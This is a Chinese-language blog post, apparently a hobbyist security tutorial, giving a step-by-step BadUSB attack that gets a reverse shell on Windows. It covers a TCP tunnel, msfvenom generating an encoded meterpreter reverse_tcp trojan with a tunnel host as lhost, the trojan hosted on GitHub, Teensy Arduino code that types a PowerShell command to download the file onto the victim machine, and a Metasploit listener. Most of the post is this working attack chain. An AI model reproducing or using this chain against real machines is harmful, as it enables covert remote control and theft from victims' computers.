HID+MSF反弹shell
准备工作
- 一块 Teensy2.0++ 的板子(淘宝一搜就有)
- Arduino编译器
- 1.8.7版本下载连接:arduino下载地址
- Teensy插件
- 下载连接:Teensy下载地址
1.下载好arduino后直接解压
1 | ⚡ /home/da1sy/arduino-1.8.7# ./arduino |
2.安装Teensy插件
1 | ⚡ /home/da1sy/arduino-1.8.7# ./TeensyduinoInstall.linux64 |
注意将插件安装到arduino的解压目录下
3.arduino修改配置
打开软件后将 工具 下配置修改如下
4.利用ngrok实现内网穿透
在https://www.ngrok.cc/ 注册账号后开通tcp隧道
下载客户端
1 | ⚡/home/da1sy/桌面/linux_amd64# ./sunny clientid 隧道ID号 |
5.利用msfvenom生成windows端木马
1 | ⚡/home/da1sy# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=free.idcfengye.com lport=17839 -f exe > windows.exe |
lhost 为运行sunny后的域名,lport为开通隧道时填写的端口(运行后也会有显示)
最后将生成的木马放到github项目上实现远程下载
6.编辑arduino代码
1 | char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'https://raw.githubusercontent.com/da1sy/da1sy/master/windows.exe';$file = ' %HOMEPATH%\\windows.exe ';$clnt.DownloadFile($url,$file); "; |
编辑好后点验证,然后插入Teensy板子,最后按一下板子上的按钮完成上传
7.metasploit开启监听
1 | ⚡ /home/da1sy/# msfconsole |
[TOC]
8.最后对目标插入badusb
效果图如下
监听端
最后反弹的会话好像是出现了毛病,不过总体上问题不大
一些其他的代码
1 | 有时间再补 |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 偏有宸机!
评论